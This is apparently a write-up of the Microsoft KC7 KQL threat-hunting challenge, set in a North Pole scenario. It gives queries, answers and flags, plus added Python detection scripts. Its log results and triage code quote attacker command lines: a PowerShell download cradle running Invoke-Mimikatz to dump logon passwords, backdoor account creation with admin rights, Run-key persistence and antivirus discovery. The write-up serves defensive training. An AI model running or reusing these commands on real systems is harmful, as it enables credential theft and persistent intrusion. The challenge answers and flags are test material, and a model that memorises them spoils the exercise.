Microsoft KC7

Difficulty: ❄ ❄ ❄ ❄ ❄
Answer two sections for silver, all four sections for gold.

KQL 101

Learn and practice basic KQL queries to analyze data logs for North Pole operations.

Section 1: KQL 101

Question 1

Type let’s do this to begin your KQL training.

ANSWER: let's do this

Question 2

Once you’ve examined all the tables, type when in doubt take 10 to proceed.

ANSWER: when in doubt take 10

Question 3

How many elves did you find?

QUERY:

Employees
| count

RESULTS:

Count
90

ANSWER: 90

Question 4

Can you find out the name of the Chief Toy Maker?

QUERY:

Employees
| where role == "Chief Toy Maker"
| project name

RESULTS:

name
Shinny Upatree

ANSWER: Shinny Upatree

Question 5

Type operator to continue.

ANSWER: operator

Question 6

How many emails did Angel Candysalt receive?

QUERY:

Email
| join kind=inner Employees on $left.recipient == $right.email_addr  // attach the recipient's employee record to each email
| where name == "Angel Candysalt"
| count

RESULTS:

Count
31

ANSWER: 31

Question 7

How many distinct recipients were seen in the email logs from twinkle_frostington@santaworkshopgeeseislands.org?

QUERY:

Email
| where sender has "twinkle_frostington@santaworkshopgeeseislands.org"
| distinct recipient
| count

RESULTS:

Count
32

ANSWER: 32

Question 8

How many distinct websites did Twinkle Frostington visit?

QUERY:

OutboundNetworkEvents
| join kind=inner Employees on $left.src_ip == $right.ip_addr  // assumes Employees.ip_addr is the elf's fixed address
| where name == "Twinkle Frostington"
| distinct url
| count

RESULTS:

Count
4

ANSWER: 4

Question 9

How many distinct domains in the PassiveDns records contain the word green?

QUERY:

PassiveDns
| where domain contains "green"  // contains is a substring match; has would only match the whole term "green"
| distinct domain
| count

RESULTS:

Count
10

ANSWER: 10

Question 10

How many distinct URLs did elves with the first name Twinkle visit?

QUERY:

OutboundNetworkEvents
| join kind=inner Employees on $left.src_ip == $right.ip_addr
| where name has "Twinkle"  // has matches the whole term, so this is the first name, not any substring
| distinct url
| count

RESULTS:

Count
8

ANSWER: 8

Operation Surrender

Investigate a phishing attack targeting Wombley’s team, uncovering espionage activities.

Section 2: Operation Surrender: Alabaster’s Espionage

Question 1

Type surrender to continue.

ANSWER: surrender

Question 2

Who was the sender of the phishing email that set this plan into motion?

QUERY:

Email
| where subject contains "surrender"
| distinct sender

RESULTS:

sender
surrender@northpolemail.com

ANSWER: surrender@northpolemail.com

Question 3

How many elves from Team Wombley received the phishing email?

QUERY:

Email
| where subject contains "surrender"
| distinct recipient  // every recipient of the lure; the question treats them all as Team Wombley
| count

RESULTS:

count
22

ANSWER: 22

Question 4

What was the filename of the document that Team Alabaster distributed in their phishing email?

QUERY:

Email
| where subject contains "surrender"
| extend filename = tostring(split(link, "/")[-1])  // last path segment of the link
| distinct filename

RESULTS:

filename
Team_Wombley_Surrender.doc

ANSWER: Team_Wombley_Surrender.doc

Question 5

Who was the first person from Team Wombley to click the URL in the phishing email?

QUERY:

Employees
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where url has "Team_Wombley_Surrender.doc"
| sort by timestamp asc
| limit 1
| project name

RESULTS:

name
Joyelle Tinseltoe

ANSWER: Joyelle Tinseltoe

Question 6

What was the filename that was created after the .doc was downloaded and executed?

QUERY:

Employees
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| join kind=inner ProcessEvents on hostname, username
// timestamp is the download, timestamp1 the process event (join suffixes duplicate column names with 1)
| where name has "Joyelle Tinseltoe" and url has "Team_Wombley_Surrender.doc" and timestamp1 > timestamp
| sort by timestamp1 asc
| limit 2
| project download_timestamp=timestamp, execution_timestamp=timestamp1, process_commandline, process_name

RESULTS:

download_timestamp execution_timestamp process_commandline process_name
2024-11-27T14:11:45Z 2024-11-27T14:12:44Z Explorer.exe "C:\Users\jotinseltoe\Downloads\Team_Wombley_Surrender.doc" Explorer.exe
2024-11-27T14:11:45Z 2024-11-27T14:12:45Z C:\Users\Public\AppData\Roaming\keylogger.exe keylogger.exe

ANSWER:
The results show that only 59 s after downloading the file Joyelle opened it (😡 bad user!), and the very next process event on her host, one second later, has the command line C:\Users\Public\AppData\Roaming\keylogger.exe. A binary launched from the Public profile's AppData is not where legitimate software lives, so this looks like a payload dropped by the document.
The answer is the filename keylogger.exe.
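The download-to-execution correlation above, as an added Python example that is not part of the original write-up or of KC7. It finds each elf's fetch of the lure document in the network events, lists what ran on that elf's host in the minutes after, and reports which process names had never been seen on the host before the click, which is the dropped-payload candidate. The Employees and OutboundNetworkEvents rows are constructed; the lure filename, Joyelle's username and the two post-click process rows are copied from the results above, while the lure host example.invalid, the IP addresses, the hostnames and the second elf are made up for the example.

```python
"""Download-to-execution correlation (added example, not from the write-up or KC7)."""
from datetime import datetime, timedelta


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


LURE = "Team_Wombley_Surrender.doc"

EMPLOYEES = [  # constructed Employees rows
    {"name": "Joyelle Tinseltoe", "ip_addr": "10.10.1.23",
     "hostname": "JT-LAPTOP", "username": "jotinseltoe"},
    {"name": "Example Elf", "ip_addr": "10.10.1.40",
     "hostname": "EX-LAPTOP", "username": "exelf"},
]

NET_EVENTS = [  # constructed OutboundNetworkEvents rows
    {"timestamp": "2024-11-27T13:59:02Z", "src_ip": "10.10.1.40", "url": "https://example.invalid/news"},
    {"timestamp": "2024-11-27T14:11:45Z", "src_ip": "10.10.1.23", "url": "https://example.invalid/" + LURE},
    {"timestamp": "2024-11-27T14:30:00Z", "src_ip": "10.10.1.40", "url": "https://example.invalid/" + LURE},
]

PROC_EVENTS = [  # ProcessEvents rows; the two 14:12 rows are from the write-up's results, the rest constructed
    {"timestamp": "2024-11-27T09:00:00Z", "hostname": "JT-LAPTOP", "username": "jotinseltoe",
     "process_name": "Explorer.exe", "process_commandline": "Explorer.exe"},
    {"timestamp": "2024-11-27T14:12:44Z", "hostname": "JT-LAPTOP", "username": "jotinseltoe",
     "process_name": "Explorer.exe",
     "process_commandline": r'Explorer.exe "C:\Users\jotinseltoe\Downloads\Team_Wombley_Surrender.doc"'},
    {"timestamp": "2024-11-27T14:12:45Z", "hostname": "JT-LAPTOP", "username": "jotinseltoe",
     "process_name": "keylogger.exe",
     "process_commandline": r"C:\Users\Public\AppData\Roaming\keylogger.exe"},
    {"timestamp": "2024-11-27T16:00:00Z", "hostname": "JT-LAPTOP", "username": "jotinseltoe",
     "process_name": "cmd.exe", "process_commandline": "cmd.exe"},  # outside the window
    {"timestamp": "2024-11-27T10:00:00Z", "hostname": "EX-LAPTOP", "username": "exelf",
     "process_name": "Explorer.exe", "process_commandline": "Explorer.exe"},
    {"timestamp": "2024-11-27T14:31:00Z", "hostname": "EX-LAPTOP", "username": "exelf",
     "process_name": "Explorer.exe",
     "process_commandline": r'Explorer.exe "C:\Users\exelf\Downloads\Team_Wombley_Surrender.doc"'},
]


def clicks(filename):
    """(employee, timestamp) for every fetch of a URL ending in filename, earliest first.
    Joining on src_ip assumes Employees.ip_addr is static, exactly as the KQL join does."""
    by_ip = {e["ip_addr"]: e for e in EMPLOYEES}
    hits = [(by_ip[n["src_ip"]], n["timestamp"]) for n in NET_EVENTS
            if n["src_ip"] in by_ip and n["url"].rsplit("/", 1)[-1] == filename]
    return sorted(hits, key=lambda h: parse_ts(h[1]))


def first_click(filename):
    """Name and time of the first elf to fetch the lure (Question 5)."""
    hits = clicks(filename)
    return (hits[0][0]["name"], hits[0][1]) if hits else None


def processes_after(emp, start, window=timedelta(minutes=10)):
    """Process events for the same host and user within window after start
    (the timestamp1 > timestamp condition, bounded so unrelated later activity is excluded)."""
    t0 = parse_ts(start)
    return sorted((p for p in PROC_EVENTS
                   if p["hostname"] == emp["hostname"] and p["username"] == emp["username"]
                   and t0 < parse_ts(p["timestamp"]) <= t0 + window),
                  key=lambda p: parse_ts(p["timestamp"]))


def chain(filename, window=timedelta(minutes=10)):
    """Per clicking elf: seconds from download to the first follow-on process, and the
    process names that never ran on that host before the click (Question 6)."""
    out = []
    for emp, t in clicks(filename):
        seen_before = {p["process_name"] for p in PROC_EVENTS
                       if p["hostname"] == emp["hostname"] and parse_ts(p["timestamp"]) <= parse_ts(t)}
        after = processes_after(emp, t, window)
        new = []
        for p in after:
            if p["process_name"] not in seen_before and p["process_name"] not in new:
                new.append(p["process_name"])
        delay = int((parse_ts(after[0]["timestamp"]) - parse_ts(t)).total_seconds()) if after else None
        out.append({"name": emp["name"], "click": t, "delay_s": delay, "new_processes": new})
    return out


if __name__ == "__main__":
    print(first_click(LURE))
    for row in chain(LURE):
        print(row)
```

The baseline check is what the KQL `limit 2` hand-waves: Explorer.exe opening the document is expected on any workstation, while keylogger.exe appearing for the first time right after the click is what makes it the dropped payload. The second elf opens the same document and produces nothing new, which is the case a query that only sorts by time would still surface as a hit.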

Question 7

To obtain your flag use the KQL below with your last answer!

QUERY:

print base64_encode_tostring("keylogger.exe");

RESULTS:

print_0
a2V5bG9nZ2VyLmV4ZQ==

ANSWER: a2V5bG9nZ2VyLmV4ZQ==

Operation Snowfall

Track and analyze the impacts of a ransomware attack initiated by Wombley’s faction.

Section 3: Operation Snowfall: Team Wombley’s Ransomware Raid

Question 1

Type snowfall to begin

ANSWER: snowfall

Question 2

What was the IP address associated with the password spray?

QUERY:

AuthenticationEvents
| where result == "Failed Login"
| summarize dcount(username) by src_ip  // distinct accounts targeted per source, not the raw failure count
| sort by dcount_username desc
| limit 1

RESULTS:

src_ip dcount_username
59.171.58.12 44

ANSWER: 59.171.58.12

Question 3

How many unique accounts were impacted where there was a successful login from 59.171.58.12?

QUERY:

AuthenticationEvents
| where result != "Failed Login" and src_ip == "59.171.58.12"
| distinct username
| count

RESULTS:

count
23

ANSWER: 23
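The two queries above (Questions 2 and 3) as an added Python example, not from the write-up or from KC7: rank source IPs by the number of distinct usernames they failed to log in as, then list the accounts the top spraying IP later logged into, separating plain successes from successes that followed a failed attempt against the same account from the same IP. The AuthenticationEvents rows are constructed for the example; only the spraying IP 59.171.58.12 comes from the write-up, and the usernames are made up in the write-up's naming style.

```python
"""Password-spray triage (added example, not from the write-up or KC7)."""
from collections import defaultdict
from datetime import datetime

# Constructed AuthenticationEvents-style rows: (timestamp, src_ip, username, result).
SAMPLE_EVENTS = [
    ("2024-12-15T14:40:01Z", "59.171.58.12", "alsnowball", "Failed Login"),
    ("2024-12-15T14:40:02Z", "59.171.58.12", "jotinseltoe", "Failed Login"),
    ("2024-12-15T14:40:03Z", "59.171.58.12", "noboetie", "Failed Login"),
    ("2024-12-15T14:40:04Z", "59.171.58.12", "shupatree", "Failed Login"),
    ("2024-12-15T14:41:10Z", "59.171.58.12", "alsnowball", "Successful Login"),
    ("2024-12-15T14:41:40Z", "59.171.58.12", "noboetie", "Successful Login"),
    # One user mistyping a password from the office is not a spray, however many
    # failures it produces: the distinct-user count stays at 1.
    ("2024-12-15T09:00:00Z", "10.10.0.5", "alsnowball", "Failed Login"),
    ("2024-12-15T09:00:10Z", "10.10.0.5", "alsnowball", "Failed Login"),
    ("2024-12-15T09:00:20Z", "10.10.0.5", "alsnowball", "Successful Login"),
    ("2024-12-15T09:05:00Z", "10.10.0.7", "shupatree", "Successful Login"),
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def failed_user_counts(events):
    """Distinct usernames with a failed login, per source IP (the KQL dcount)."""
    users = defaultdict(set)
    for _, ip, user, result in events:
        if result == "Failed Login":
            users[ip].add(user)
    return {ip: len(u) for ip, u in users.items()}


def spray_sources(events, min_users=3):
    """Source IPs that failed against at least min_users distinct accounts, busiest first.
    Counting distinct users rather than raw failures is what separates a spray
    from one user fumbling a password."""
    counts = failed_user_counts(events)
    return sorted((ip for ip, n in counts.items() if n >= min_users),
                  key=lambda ip: -counts[ip])


def accounts_accessed(events, ip):
    """Accounts with a successful login from ip (the Question 3 count), and the subset
    where that success came after a failed attempt from the same ip against the same
    account: the spray-then-login pattern that marks a guessed password."""
    first_failure = {}
    succeeded, sprayed_then_in = set(), set()
    for ts, src, user, result in sorted(events, key=lambda e: parse_ts(e[0])):
        if src != ip:
            continue
        when = parse_ts(ts)
        if result == "Failed Login":
            first_failure.setdefault(user, when)
        else:
            succeeded.add(user)
            if user in first_failure and first_failure[user] < when:
                sprayed_then_in.add(user)
    return sorted(succeeded), sorted(sprayed_then_in)


if __name__ == "__main__":
    for ip in spray_sources(SAMPLE_EVENTS):
        hit, guessed = accounts_accessed(SAMPLE_EVENTS, ip)
        print(f"{ip}: {failed_user_counts(SAMPLE_EVENTS)[ip]} accounts sprayed, "
              f"logged into {hit}, guessed passwords for {guessed}")
```

The threshold is the knob to tune: a corporate NAT gateway or VPN concentrator will also show failures against many distinct users, so in real telemetry the distinct-user count should be read together with the failure-to-success ratio and the time window rather than taking the top IP on its own, as the KQL `limit 1` does.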

Question 4

What service was used to access these accounts/devices?

QUERY:

AuthenticationEvents
| where src_ip == "59.171.58.12" and result != "Failed Login"
| extend service = tostring(split(split(description, " ")[-1], ".")[0])  // last word of the description, minus its trailing period
| distinct service

RESULTS:

service
RDP

ANSWER: RDP

Question 5

What file was exfiltrated from Alabaster’s laptop?

QUERY:

AuthenticationEvents
| join kind=inner Employees on hostname
| join kind=inner ProcessEvents on hostname
// timestamp is the login, timestamp1 the process event on the same host
| where name == "Alabaster Snowball" and src_ip == "59.171.58.12" and result != "Failed Login" and timestamp1 > timestamp and process_commandline has "copy"
| sort by timestamp1 asc
| project timestamp1, process_commandline

RESULTS:

timestamp1 process_commandline
2024-12-15T14:52:13Z Copy-Item "C:\\Malware\\EncryptEverything.exe" -Destination "C:\\Windows\\Users\\alsnowball"
2024-12-15T14:52:32Z copy C:\Windows\Users\alsnowball\top secret\Snowball_Cannon_Plans.pdf C:\Users\alsnowball\Documents\Snowball_Cannon_Plans.pdf
2024-12-16T14:53:27Z copy C:\Windows\Users\alsnowball\top secret\Drone_Configurations.pdf C:\Users\alsnowball\Documents\Drone_Configurations.pdf
2024-12-16T15:51:52Z copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \\wocube\share\alsnowball\Secret_Files.zip

ANSWER:
ProcessEvents shows several copy commands after the successful login, but only the last one, copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \\wocube\share\alsnowball\Secret_Files.zip, writes to a remote share rather than a local folder; the earlier copies only stage the malware and the secret PDFs on the laptop itself. That outbound copy is the exfiltration.
The answer is the filename Secret_Files.zip.

Question 6

What is the name of the malicious file that was run on Alabaster’s laptop?

QUERY:

AuthenticationEvents
| join kind=inner Employees on hostname
| join kind=inner ProcessEvents on hostname
| where name == "Alabaster Snowball" and src_ip == "59.171.58.12" and result != "Failed Login" and timestamp1 > timestamp
| distinct process_name

RESULTS:

process_name
cmd.exe
svchost.exe
msedgewebview2.exe
powershell.exe
EncryptEverything.exe
searchprotocolhost.exe
comppkgsrv.exe
Copy-Item

ANSWER:
Among the processes run on Alabaster's machine after the successful logins from 59.171.58.12, the one that stands out is EncryptEverything.exe, the binary that the first Copy-Item in the previous question staged from C:\Malware.
The answer is EncryptEverything.exe.

Question 7

To obtain your flag use the KQL below with your last answer!

QUERY:

print base64_encode_tostring("EncryptEverything.exe");

RESULTS:

print_0
RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl

ANSWER: RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl

Echoes in the Frost

Use logs to trace an unknown phishing attack targeting Alabaster’s faction.

Section 4: Echoes in the Frost: Tracking the Unknown Threat

Question 1

Type stay frosty to begin

ANSWER: stay frosty

Question 2

What was the timestamp of the first phishing email about the breached credentials received by Noel Boetie?

QUERY:

Email
| where subject has "credentials"
| sort by timestamp asc
| project timestamp
| limit 1

RESULTS:

timestamp
2024-12-12T14:48:55Z

ANSWER: 2024-12-12T14:48:55Z
Note that this query does not restrict the recipient; to confirm the email went to Noel Boetie, join Employees on recipient and filter on name as in the next question.

Question 3

When did Noel Boetie click the link to the first file?

QUERY:

Email
| join kind=inner Employees on $left.recipient == $right.email_addr
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip, $left.link == $right.url
| where subject has "credentials" and timestamp1 > timestamp  // the click (timestamp1) must come after the email (timestamp)
| project timestamp1
| sort by timestamp1 asc
| limit 1

RESULTS:

timestamp1
2024-12-12T15:13:55Z

ANSWER: 2024-12-12T15:13:55Z

Question 4

What was the IP for the domain where the file was hosted?

QUERY:

Email
| where subject has "credentials"
| extend domain = tostring(split(link,"/")[2])  // host part of https://host/path
| join kind=inner PassiveDns on domain
| distinct ip

RESULTS:

ip
182.56.23.122

ANSWER: 182.56.23.122

Question 5

Let’s take a closer look at the authentication events. I wonder if there were any connection events from 182.56.23.122. If so, what hostname was accessed?

QUERY:

AuthenticationEvents
| where src_ip == "182.56.23.122"
| distinct hostname

RESULTS:

hostname
WebApp-ElvesWorkshop

ANSWER: WebApp-ElvesWorkshop

Question 6

What was the script that was run to obtain credentials?

QUERY:

AuthenticationEvents
| join kind=inner ProcessEvents on hostname
| where src_ip == "182.56.23.122" and timestamp1 > timestamp  // processes started after the login from that IP
| project process_commandline

RESULTS:

process_commandline
net user frosty AllYourBaseBelongToUs /add
powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords"
net view /domain
net localgroup administrators frosty /add
ipconfig /all
tasklist | findstr /I "mcshield.exe"
tasklist | findstr /I "norton.exe"
tasklist | findstr /I "avp.exe"

ANSWER:
Among the commands executed after the authentication from 182.56.23.122 is powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords", a download cradle that fetches Invoke-Mimikatz.ps1 straight into memory and runs it to dump logon credentials from LSASS.
The answer is the script name Invoke-Mimikatz.ps1.

Question 7

What is the timestamp where Noel executed the file?

QUERY:

Email
| join kind=inner Employees on $left.recipient == $right.email_addr
| join kind=inner ProcessEvents on hostname
| extend filename = tostring(split(link, "/")[-1])  // file name from the phishing link
| where subject has "credentials" and process_commandline has filename
| project timestamp1, process_commandline
| sort by timestamp1 asc
| limit 1

RESULTS:

timestamp1 process_commandline
2024-12-12T15:14:38Z Explorer.exe "C:\Users\noboetie\Downloads\echo.exe"

ANSWER: 2024-12-12T15:14:38Z

Question 8

What domain was the holidaycandy.hta file downloaded from?

QUERY:

OutboundNetworkEvents
| where url has "holidaycandy.hta"
| extend domain = tostring(split(url,"/")[2])
| distinct domain

RESULTS:

domain
compromisedchristmastoys.com

ANSWER: compromisedchristmastoys.com

Question 9

What was the first file that was created after extraction?

QUERY:

ProcessEvents
| join kind=inner FileCreationEvents on hostname
| where process_commandline has "frosty.zip" and timestamp1 > timestamp  // timestamp1 is the file creation time
| top 1 by timestamp1 asc  // top keeps the ordering; distinct after sort does not guarantee it
| project filename

RESULTS:

filename
sqlwriter.exe

ANSWER: sqlwriter.exe

Question 10

What is the name of the property assigned to the new registry key?

QUERY:

ProcessEvents
| join kind=inner ProcessEvents on hostname  // self-join: every later process on the same host
| where process_commandline has "frosty.txt" and timestamp1 > timestamp
| project process_commandline1

RESULTS:

process_commandline1
tar -xf C:\\Windows\\Tasks\\frosty.zip -C C:\\Windows\\Tasks\\
New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "MS SQL Writer" -Force | New-ItemProperty -Name "frosty" -Value "C:\Windows\Tasks\sqlwriter.exe" -PropertyType String -Force

ANSWER: frosty
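Command-line triage for the ProcessEvents rows in this section, as an added Python example that is not part of the write-up or of KC7. It serves Question 6 (which script was pulled down) and Question 10 (which registry value was written): each command line is tagged with the technique it shows (download cradle, credential dumping, account creation, local-admin grant, host and AV discovery, archive extraction, Run-key persistence), the script name is taken from the URL in the download cradle, and the persistence line is parsed into key, value name and payload. The ten attacker command lines are copied from the RESULTS blocks above; the two benign lines are constructed for contrast. The regexes are approximate matchers written for this example, not a PowerShell parser.

```python
"""Command-line triage (added example, not from the write-up or KC7)."""
import re
from urllib.parse import urlparse

# Copied from the ProcessEvents results in this section.
ATTACKER_CMDLINES = [
    r'net user frosty AllYourBaseBelongToUs /add',
    r'powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords"',
    r'net view /domain',
    r'net localgroup administrators frosty /add',
    r'ipconfig /all',
    r'tasklist | findstr /I "mcshield.exe"',
    r'tasklist | findstr /I "norton.exe"',
    r'tasklist | findstr /I "avp.exe"',
    r'tar -xf C:\\Windows\\Tasks\\frosty.zip -C C:\\Windows\\Tasks\\',
    r'New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "MS SQL Writer" -Force | New-ItemProperty -Name "frosty" -Value "C:\Windows\Tasks\sqlwriter.exe" -PropertyType String -Force',
]
BENIGN_CMDLINES = [  # constructed
    r'notepad.exe C:\Users\noboetie\Documents\notes.txt',
    r'svchost.exe -k netsvcs -p',
]

# Ordered (tag, pattern) rules; a line may match several.
RULES = [
    ("download_cradle", re.compile(r"\b(IEX|Invoke-Expression)\b.*\b(DownloadString|DownloadFile|Invoke-WebRequest)\b", re.I)),
    ("credential_dumping", re.compile(r"Invoke-Mimikatz|sekurlsa::|lsadump::", re.I)),
    ("account_creation", re.compile(r"^\s*net\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("local_admin_grant", re.compile(r"^\s*net\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("host_discovery", re.compile(r"^\s*(net\s+view\b|ipconfig\s+/all)", re.I)),
    ("av_discovery", re.compile(r"tasklist.*findstr.*\b(mcshield|norton|avp|msmpeng)\b", re.I)),
    ("archive_extraction", re.compile(r"^\s*tar\s+-x", re.I)),
    ("run_key_persistence", re.compile(r"CurrentVersion\\Run\b.*(New-ItemProperty|Set-ItemProperty|reg\s+add)", re.I)),
]


def classify(cmdline):
    """Tags of every rule the command line trips, in rule order."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]


def triage(cmdlines):
    """Only the lines that trip at least one rule, with their tags, in input order."""
    return [(c, classify(c)) for c in cmdlines if classify(c)]


def downloaded_scripts(cmdline):
    """File names at the end of URLs in a download cradle (Question 6)."""
    if "download_cradle" not in classify(cmdline):
        return []
    urls = re.findall(r"""https?://[^\s"')]+""", cmdline)
    return [urlparse(u).path.rsplit("/", 1)[-1] for u in urls]


def run_key_persistence(cmdline):
    """Key, value name and payload from a New-Item | New-ItemProperty Run-key line (Question 10)."""
    if "run_key_persistence" not in classify(cmdline):
        return None
    path = re.search(r'-Path\s+"([^"]+)"', cmdline)
    subkey = re.search(r'New-Item\s+.*?-Name\s+"([^"]+)"', cmdline)  # New-Item followed by whitespace, not New-ItemProperty
    prop = re.search(r'New-ItemProperty\s+.*?-Name\s+"([^"]+)"\s+-Value\s+"([^"]+)"', cmdline)
    if not (path and prop):
        return None
    key = path.group(1) + ("\\" + subkey.group(1) if subkey else "")
    return {"key": key, "value_name": prop.group(1), "payload": prop.group(2)}


if __name__ == "__main__":
    for cmd, tags in triage(ATTACKER_CMDLINES + BENIGN_CMDLINES):
        print(tags, cmd[:60])
    print(downloaded_scripts(ATTACKER_CMDLINES[1]))
    print(run_key_persistence(ATTACKER_CMDLINES[9]))
```

The persistence payload the parser returns, C:\Windows\Tasks\sqlwriter.exe, is the file Question 9 found being created right after the archive was extracted, so the two answers corroborate each other: the attacker unpacked frosty.zip into C:\Windows\Tasks and pointed a Run value named frosty at the binary it dropped.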

Question 11

To obtain your FINAL flag use the KQL below with your last answer!

QUERY:

print base64_encode_tostring("frosty");

RESULTS:

print_0
ZnJvc3R5

ANSWER: ZnJvc3R5